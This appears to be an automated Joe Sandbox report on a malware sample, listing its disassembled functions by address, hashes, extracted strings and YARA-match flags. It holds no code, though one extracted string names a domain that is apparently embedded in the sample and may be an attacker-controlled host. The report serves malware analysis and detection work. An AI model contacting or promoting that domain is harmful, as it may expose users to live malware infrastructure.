Instruction ID: 390ac77178e4074cff8035e6744b5837b32c422173b0328ab0279bc873581c68
Opcode Fuzzy Hash: d51ca7546fb35149707e9a4e558836ac4b566572d278ca2866f6bef816fa7ae2
Instruction Fuzzy Hash: 67029D71614BC08BE3198F3DC891356BFE2AB56304F0CC9ADD4DACB78BC229E5458B65

Function 00434CEF Relevance: 4.2, Strings: 3, Instructions: 429COMMON

Download Yara Rule

Strings

., xrefs: 00434DE2
K, xrefs: 00434DDE
$, xrefs: 00434DE6

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: $$.$K
API String ID: 0-4278605028
Opcode ID: d51ca7546fb35149707e9a4e558836ac4b566572d278ca2866f6bef816fa7ae2
Instruction ID: 6a15d43e6d9dc7541644536baa1fca88b34eed3a23bb6af0385b7f8a4183f52c
Opcode Fuzzy Hash: d51ca7546fb35149707e9a4e558836ac4b566572d278ca2866f6bef816fa7ae2
Instruction Fuzzy Hash: 69029E71614BC08BE3158F3DC891392BFE2AB56304F1CC9AED4DACB787C229E5458B65

Function 0083EDC6 Relevance: 4.1, Strings: 3, Instructions: 313COMMON

Download Yara Rule

Strings

4b, xrefs: 0083F041
8<j?, xrefs: 0083EFB7
D, xrefs: 0083EFCF

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: 8<j?$D$4b
API String ID: 0-2390459867
Opcode ID: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
Instruction ID: 8fd003219b6f81124eafb0f0bb11238bf43b2bf20ca4239bdcbc577c9f493e9b
Opcode Fuzzy Hash: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
Instruction Fuzzy Hash: C581FA6120C3818BD719CF3984A137AFBD1EFD6318F28896DE4D5CB282D679C505C796

Function 0083EE1A Relevance: 4.1, Strings: 3, Instructions: 313COMMON

Download Yara Rule

Strings

4b, xrefs: 0083F041
8<j?, xrefs: 0083EFB7
D, xrefs: 0083EFCF

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: 8<j?$D$4b
API String ID: 0-2390459867
Opcode ID: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
Instruction ID: 34b9dfed951b889ac218a78655dab4321ed72b9e95f7ff3293b3b841619cea10
Opcode Fuzzy Hash: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
Instruction Fuzzy Hash: 9881096120C3818BD719CF3984A136AFBD1EFD6318F28896DE4D5CB282D679C50AC796

Function 0042EB5F Relevance: 4.1, Strings: 3, Instructions: 313COMMON

Download Yara Rule

Strings

4b, xrefs: 0042EDDA
D, xrefs: 0042ED68
8<j?, xrefs: 0042ED50

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: 8<j?$D$4b
API String ID: 0-2390459867
Opcode ID: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
Instruction ID: 3d775767d977819f4cd04dfa65fb75d6d4b79ad1faca8718d285b39be461a68a
Opcode Fuzzy Hash: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
Instruction Fuzzy Hash: 1781F86020C3928BD719CF3A946137BBFD19FD6314F69896EE4D68B381D27DC406871A

Function 0042EBB3 Relevance: 4.1, Strings: 3, Instructions: 313COMMON

Download Yara Rule

Strings

4b, xrefs: 0042EDDA
D, xrefs: 0042ED68
8<j?, xrefs: 0042ED50

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: 8<j?$D$4b
API String ID: 0-2390459867
Opcode ID: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
Instruction ID: e8062cfa3f92b269e517a95a0a15263ae71e3fa69566e020a52e9e5137cfccfc
Opcode Fuzzy Hash: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
Instruction Fuzzy Hash: 7281F86030C3928BD718CF3A946136BBBD19FD6314F69896EE4D68B381D27DC406875A

Function 008191F7 Relevance: 4.1, Strings: 3, Instructions: 304COMMON

Download Yara Rule

Strings

#=0, xrefs: 0081922C
Z, xrefs: 0081934F
ut, xrefs: 00819348

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: #=0$Z$ut
API String ID: 0-1971374411
Opcode ID: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
Instruction ID: 75e0707c359fb64bd6434ffeef3c985eaa48b0bfe6021054961394a33dac9122
Opcode Fuzzy Hash: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
Instruction Fuzzy Hash: EE81063110C3828AD705CF38C4607AAFFE5EFA3314F1899ADD4D6DB692D629C50AC756

Function 0083EE08 Relevance: 4.0, Strings: 3, Instructions: 290COMMON

Download Yara Rule

Strings

4b, xrefs: 0083F041
8<j?, xrefs: 0083EFB7
D, xrefs: 0083EFCF

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: 8<j?$D$4b
API String ID: 0-2390459867
Opcode ID: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
Instruction ID: 1fbaffabc41d129abde8fe26a555a1130757ccd517f4720b0b78cb2a4efd67bf
Opcode Fuzzy Hash: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
Instruction Fuzzy Hash: 5181E9616083818BD719CF3984A137AFFD1EFE6314F2C496DE4D18B282D279C50A8B96

Function 0042EBA1 Relevance: 4.0, Strings: 3, Instructions: 290COMMON

Download Yara Rule

Strings

4b, xrefs: 0042EDDA
D, xrefs: 0042ED68
8<j?, xrefs: 0042ED50

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: 8<j?$D$4b
API String ID: 0-2390459867
Opcode ID: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
Instruction ID: b31d7765b50fe5da72acd4eceaa3461b1016088ded1e177ce8b27f3ca53c8b68
Opcode Fuzzy Hash: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
Instruction Fuzzy Hash: 7E81E8602083918BD719CF3A946136BFFD29FE6314F6D496EE4D18B381D23CC5068B5A

Function 00442D20 Relevance: 4.0, Strings: 3, Instructions: 282COMMON

Download Yara Rule

Strings

D`a&, xrefs: 00442ED5
bX_^, xrefs: 00442D22
NMNO, xrefs: 00442E20

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID: InitializeThunk
String ID: D`a&$NMNO$bX_^
API String ID: 2994545307-620122162
Opcode ID: 51c52ee6fa743efb5b12906464a989dcb7610fc356cb75f60a3162c2e45413f4
Instruction ID: 6e9e5fc7c2cb7ec0ed59593f00f51acd5d9bbc11244cb29e2d173750d6d6eb6d
Opcode Fuzzy Hash: 51c52ee6fa743efb5b12906464a989dcb7610fc356cb75f60a3162c2e45413f4
Instruction Fuzzy Hash: 558167312083014FE318DF24DC8166BB7A2EBC5328F69862DE5A54B391DB79ED0AC759

Function 008284C2 Relevance: 4.0, Strings: 3, Instructions: 231COMMON

Download Yara Rule

Strings

gfff, xrefs: 00828651
7, xrefs: 0082860A
), xrefs: 008285E1

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: )$7$gfff
API String ID: 0-3859371245
Opcode ID: 60e49d7894c15ae3aa33853dce523991c204049145f125d3a07e5eda309779ae
Instruction ID: f1f8b321e99850450975afc5d8152235a88c82dc61e8fc80d1fbab039693864a
Opcode Fuzzy Hash: 60e49d7894c15ae3aa33853dce523991c204049145f125d3a07e5eda309779ae
Instruction Fuzzy Hash: 01814672A142628BD728CF28DC41BAB77D2FBC4314F18C92DD485CB395EB38D8468785

Function 0041825B Relevance: 4.0, Strings: 3, Instructions: 231COMMON

Download Yara Rule

Strings

7, xrefs: 004183A3
gfff, xrefs: 004183EA
), xrefs: 0041837A

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: )$7$gfff
API String ID: 0-3859371245
Opcode ID: 65dc81d769e5c8ee4e27a7d15ee325795d27feb2d3b9459f78503db774decfd6
Instruction ID: 9f03ba7914f0360cb7709cea8ad3b28f347f0d2189de7c473bd193f5a0b7fd0c
Opcode Fuzzy Hash: 65dc81d769e5c8ee4e27a7d15ee325795d27feb2d3b9459f78503db774decfd6
Instruction Fuzzy Hash: D4812572A142118BD324CF28DC417AB77E2EBC8314F18C92ED985DB395EB3CD8468785

Function 00427133 Relevance: 4.0, Strings: 3, Instructions: 219COMMON

Download Yara Rule

Strings

UUQg, xrefs: 00427323
FOOE, xrefs: 00427307
KGFU, xrefs: 00427315

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: FOOE$KGFU$UUQg
API String ID: 0-2281124432
Opcode ID: aa3e6234d37e5ff48adc82abd2c06de17444a92e0354e9c2c603a59569284f89
Instruction ID: e3d0f05a3102c402a5be3d16b6d50dde008b8d5973f854c9b7a8b98ef3316d4d
Opcode Fuzzy Hash: aa3e6234d37e5ff48adc82abd2c06de17444a92e0354e9c2c603a59569284f89
Instruction Fuzzy Hash: 9A619D72B49262CFD710CBA4D8402AAF7A2EF55310B5D42ABD8558B382E33CDD12D3A5

Function 0082B18B Relevance: 3.9, Strings: 3, Instructions: 196COMMON

Download Yara Rule

Strings

t]ae, xrefs: 0082B2E8
5230, xrefs: 0082B228
I`af, xrefs: 0082B29F

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: 5230$I`af$t]ae
API String ID: 0-812676372
Opcode ID: 99ad52d241a312d1886458a9d982083b732080c3046440976dde46d31c833c5f
Instruction ID: 4d5fec66a9828f5b17deafe5678c6076ce75f90da429ec5cecce888fc814e4c0
Opcode Fuzzy Hash: 99ad52d241a312d1886458a9d982083b732080c3046440976dde46d31c833c5f
Instruction Fuzzy Hash: C1515772A15B808FD738CF65D891B67BBE3FBA1304F18896DC1C2C7695DAB8A405C700

Function 0082DD37 Relevance: 3.9, Strings: 3, Instructions: 156COMMON

Download Yara Rule

Strings

1, xrefs: 0082DE0A
A, xrefs: 0082DE7F
5230, xrefs: 0082DD87

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: 1$5230$A
API String ID: 0-2921844354
Opcode ID: c88d49dccca9c115cac4552a1e1a4679eb3bb04cb6d09c4ebc94843ec1f1dc21
Instruction ID: 81ac32726a7f457bda548223d75227b1b8c9f328aa26e3bed3ab52a782c85109
Opcode Fuzzy Hash: c88d49dccca9c115cac4552a1e1a4679eb3bb04cb6d09c4ebc94843ec1f1dc21
Instruction Fuzzy Hash: 76417B32A4C3405AE324AE64DC8676BBAE3EBD1324F1CC93DF199872C5E9B844468312

Function 0041DAD0 Relevance: 3.9, Strings: 3, Instructions: 156COMMON

Download Yara Rule

Strings

1, xrefs: 0041DBA3
A, xrefs: 0041DC18
5230, xrefs: 0041DB20

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: 1$5230$A
API String ID: 0-2921844354
Opcode ID: 2f0b92b3633f1c98435bd7295618cc795514d651c00833ac90ced833c2e04a77
Instruction ID: e76a71f95e24524307293e01d01a6f58a23ad2f1a40c0433447d02162c8ae966
Opcode Fuzzy Hash: 2f0b92b3633f1c98435bd7295618cc795514d651c00833ac90ced833c2e04a77
Instruction Fuzzy Hash: F8416972A5C3405AE324AE65CC827ABB6D3EBD1324F18C93EF1D9472C5E9F848428316

Function 0081092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

l, xrefs: 00810966
., xrefs: 0081095F
GetProcAddress., xrefs: 008109DC, 008109DF, 008109E4

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: a7102a0f231689fd65fa398c2c22b4531c2a6e7a60fdd3dc0dfb7c8f969c8fff
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: DD3118B6900619DFDB10CF99C880AEDBBF9FF48324F25414AD441E7211D7B1AA85CFA4

Function 00414C20 Relevance: 3.5, Strings: 2, Instructions: 989COMMON

Download Yara Rule

Strings

UA, xrefs: 004155D4
NP,?, xrefs: 00415070

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: NP,?$UA
API String ID: 0-2573221895
Opcode ID: f3b4bdac48d04733325c366b291ac1942f3de7c5feead7c6aebd27b0ca121fbf
Instruction ID: 7e2827b50fa6ca7fd58d98589243822aea337e03717d5c259c09a672e0419966
Opcode Fuzzy Hash: f3b4bdac48d04733325c366b291ac1942f3de7c5feead7c6aebd27b0ca121fbf
Instruction Fuzzy Hash: 1F522475608310DBD714DF28DC82BAB73A2EBC6314F58463DF995872E1E738A846C789

Function 0041F6D0 Relevance: 3.3, Strings: 2, Instructions: 817COMMON

Download Yara Rule

Strings

B, xrefs: 00420058
9B, xrefs: 004201A0

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: 9B$B
API String ID: 0-4208784936
Opcode ID: 998969fd36f39ea8882a93f1b2bc5358949fe11c9a695f48cb2043242e4bd665
Instruction ID: b8962ee0846928653caa32ab1d9872d6313577c24d17d84896ac92dc99d0ed25
Opcode Fuzzy Hash: 998969fd36f39ea8882a93f1b2bc5358949fe11c9a695f48cb2043242e4bd665
Instruction Fuzzy Hash: EF72B1B1619F808ED329CF3C8805397BFD6AB5A324F188B5EA0FA877D2C77561018756

Function 00404DC0 Relevance: 3.3, Strings: 2, Instructions: 792COMMON

Download Yara Rule

Strings

0, xrefs: 004056DB
8, xrefs: 004056D3

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 9612933fc297b7a00c689e7fbac69d4004b63af12444fb0bab41654d38c377b2
Instruction ID: e9fa4f5d571cc9b4581d9cfd2bfe47746d9f72a1d82526b1dd5866670584724d
Opcode Fuzzy Hash: 9612933fc297b7a00c689e7fbac69d4004b63af12444fb0bab41654d38c377b2
Instruction Fuzzy Hash: 78720071508740AFD710CF18C884BABBBE1EB89314F04892EF9999B391D379D958CF96

Function 0042B170 Relevance: 2.9, Strings: 2, Instructions: 428COMMON

Download Yara Rule

Strings

?;;, xrefs: 0042B3AA
{wBy, xrefs: 0042B538

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: {wBy$?;;
API String ID: 0-3800777323
Opcode ID: 7def6b60f56c6d725d5e071de4d200a350b8a8c6a335b4aaf75fe223ba032cac
Instruction ID: c7db1f9763108cdebf81104c4566820d91597438b4a38115d6d9003e34c696d3
Opcode Fuzzy Hash: 7def6b60f56c6d725d5e071de4d200a350b8a8c6a335b4aaf75fe223ba032cac
Instruction Fuzzy Hash: 1AF1F1B4A08350DFD3159F28E89172BB7E1EF86308F484A6DF4D5872A2D3399901DB5A

Function 008420F5 Relevance: 2.9, Strings: 2, Instructions: 383COMMON

Download Yara Rule

Strings

nz, xrefs: 008422B8
nz, xrefs: 008422B1

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: nz$nz
API String ID: 0-4002586851
Opcode ID: 657b8ad3b5a701e97fdb508390c6d00fb43f0f4f68eec0077ab5ee9a3c7d2eea
Instruction ID: f04daddef48cbd2a0b2e6f0e4df051b9061a355c05b480426a5cef9f817c6021
Opcode Fuzzy Hash: 657b8ad3b5a701e97fdb508390c6d00fb43f0f4f68eec0077ab5ee9a3c7d2eea
Instruction Fuzzy Hash: D5E10572608B808FD315CB3CC891396BFE2AF9A314F1D866DD5EACB392D675A406C711

Function 00431E8E Relevance: 2.9, Strings: 2, Instructions: 383COMMON

Download Yara Rule

Strings

nz, xrefs: 00432051
nz, xrefs: 0043204A

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: nz$nz
API String ID: 0-4002586851
Opcode ID: 526f9c3809e7de32db1ba61d9cd3c8c0a105809dfbe68e8e8f0a49bf4be969cf
Instruction ID: a3c1cfee1f99e453375e064e447a228442ae2f14524e15aa7be5cf63e3ec65e5
Opcode Fuzzy Hash: 526f9c3809e7de32db1ba61d9cd3c8c0a105809dfbe68e8e8f0a49bf4be969cf
Instruction Fuzzy Hash: ACE11872608B808FD315CA3CC891396FFE2AFDA314F1D866DC5EA8B392D675A406C715

Function 0081E249 Relevance: 2.8, Strings: 2, Instructions: 311COMMON

Download Yara Rule

Strings

UXY^, xrefs: 0081E4FC
sputnik-1985.com, xrefs: 0081E5A6

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: UXY^$sputnik-1985.com
API String ID: 0-288947201
Opcode ID: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
Instruction ID: ae05216bffe9b67c0e8be088d3901bedc3f548c0959bf3638950a07678a537b7
Opcode Fuzzy Hash: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
Instruction Fuzzy Hash: 5E9123B5604B818FD315CF29C990662FBA2FF96300B19869CD4D28FB16C779E806CF95

Function 008376F7 Relevance: 2.8, Strings: 2, Instructions: 284COMMON

Download Yara Rule

Strings

o~, xrefs: 0083784D
yr, xrefs: 00837835

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: o~$yr
API String ID: 0-1013308823
Opcode ID: f353fb7c42ac297e1fe1c84090b810e7596e2eb7232e841eeaea4071bc621b13
Instruction ID: 64a6998de457eaff9b416da8e3a3b34710158b41a3aca96f619159304522a144
Opcode Fuzzy Hash: f353fb7c42ac297e1fe1c84090b810e7596e2eb7232e841eeaea4071bc621b13
Instruction Fuzzy Hash: 6391E2B690C3508BD320DF19C8556ABBBE2EFD1314F09892CE9D99B391E7B4C905C786

Function 00427490 Relevance: 2.8, Strings: 2, Instructions: 284COMMON

Download Yara Rule

Strings

o~, xrefs: 004275E6
yr, xrefs: 004275CE

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: o~$yr
API String ID: 0-1013308823
Opcode ID: c9d48b95859aed5604db22a7b535e1b994fc6fc23f247b972c2d66fa384cb495
Instruction ID: 9949b5826033667454bdd212c251d03fc0b1eef30724b4879d74d6325ed2a79f
Opcode Fuzzy Hash: c9d48b95859aed5604db22a7b535e1b994fc6fc23f247b972c2d66fa384cb495
Instruction Fuzzy Hash: 48913975A0C3208BD320DF19D84066BBBE2EFD5324F09892DE9D95B391E7B8C905C786

Function 00852F87 Relevance: 2.8, Strings: 2, Instructions: 282COMMON

Download Yara Rule

Strings

D`a&, xrefs: 0085313C
NMNO, xrefs: 00853087

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: D`a&$NMNO
API String ID: 0-4143563191
Opcode ID: 5cbc5e9f98f1ccd62bdde588abdd2110c86d4ae90a24e8516f9eedc10dd1988b
Instruction ID: f83132c6e64e03a62457841546d3293ae7f5b71079e9d1241b85f1cf99e0cfa3
Opcode Fuzzy Hash: 5cbc5e9f98f1ccd62bdde588abdd2110c86d4ae90a24e8516f9eedc10dd1988b
Instruction Fuzzy Hash: 6D8124312087055BD318DF28DC81A6BB7A2FFC5365F29C62CE9A58B391DB319A0D8751

Function 008384E7 Relevance: 2.6, Strings: 2, Instructions: 70COMMON

Download Yara Rule

Strings

:7$%, xrefs: 0083852C, 0083855D
:7$%, xrefs: 008385DC

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: :7$%$:7$%
API String ID: 0-2391988857
Opcode ID: f03a1582adfb2917490f5b92725fb54028286632f3ed6b7bc30f9f8cb79f3731
Instruction ID: 7f34b5a373ecf8011274c6cfcf05ce57e37529e6c91f80dff7f391402e251ebb
Opcode Fuzzy Hash: f03a1582adfb2917490f5b92725fb54028286632f3ed6b7bc30f9f8cb79f3731
Instruction Fuzzy Hash: 9F21A1715083908BD7089B69C965B6FFBE5FBD6318F145A2CE1D287291DBB48405CB82

Function 00428280 Relevance: 2.6, Strings: 2, Instructions: 70COMMON

Download Yara Rule

Strings

:7$%, xrefs: 004282C5, 004282F6
:7$%, xrefs: 00428375

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: :7$%$:7$%
API String ID: 0-2391988857
Opcode ID: f10387fb3a1dea8b0350fba9c1e9ca61dc6ddde05eb87b29ee48f7488e223d9f
Instruction ID: 0de6392d9aeb990522659998ecc2397938767f988235b0ae13ec08bed24327b9
Opcode Fuzzy Hash: f10387fb3a1dea8b0350fba9c1e9ca61dc6ddde05eb87b29ee48f7488e223d9f
Instruction Fuzzy Hash: BA21F1701093908BD7089B69C865B6FFBE4AB86318F105A2DE1D2872D1DBB48809CB82

Function 0081AC99 Relevance: 2.6, Strings: 2, Instructions: 64COMMON

Download Yara Rule

Strings

MO, xrefs: 0081AC9E
MO, xrefs: 0081AC36

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: MO$MO
API String ID: 0-3148518880
Opcode ID: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
Instruction ID: 5d2a748412046ef132218a58a0aa1e1a79c666e754bc80b9ea9a90158d73b856
Opcode Fuzzy Hash: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
Instruction Fuzzy Hash: 5811AC741452818BEF188FA8DD916A7BFA4EF42320F2499D8DC859F38BC638C541CFA5

Function 00850694 Relevance: 2.5, Strings: 2, Instructions: 44COMMON

Download Yara Rule

Strings

vA\, xrefs: 00850703
7&'$, xrefs: 008506AC

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: 7&'$$vA\
API String ID: 0-2621209329
Opcode ID: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
Instruction ID: 8877329731080ad28e9144bed9f68a827bbc1001d977e16abf5b1938a3ff58b1
Opcode Fuzzy Hash: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
